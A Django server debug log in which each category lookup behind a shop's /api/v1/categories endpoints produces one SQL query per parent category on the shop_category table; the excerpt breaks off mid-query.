223 DEBUG 2019-12-20 02:38:00,940 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:00,944 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:00,948 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:00,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:00,957 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:00,963 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:00,967 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:00,971 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:00,975 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:00,980 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:00,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:00,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:00,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:00,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:01,002 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:01,010 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:01,014 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:01,018 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:01,023 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:01,027 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:01,033 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:01,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:01,043 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:01,047 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:01,051 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:01,057 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:01,064 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:01,068 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:01,072 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:01,076 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:01,080 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:01,086 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:01,090 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:01,094 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:01,098 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:01,103 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:01,107 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:01,112 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:01,116 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:01,120 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:01,126 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:01,130 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:05,991 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-20 02:38:06,000 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:06,005 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:06,017 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 02:38:06] "GET /api/v1/categories/7 HTTP/1.0" 200 998 DEBUG 2019-12-20 02:38:06,026 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:06,031 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:38:06,038 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:06,042 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:06,046 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:06,050 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:06,054 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:06,060 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:06,064 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:06,068 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:06,072 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:06,076 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:06,082 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:06,086 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:06,090 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:06,093 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:06,097 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:06,106 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:06,110 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:06,114 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:06,118 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:06,122 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 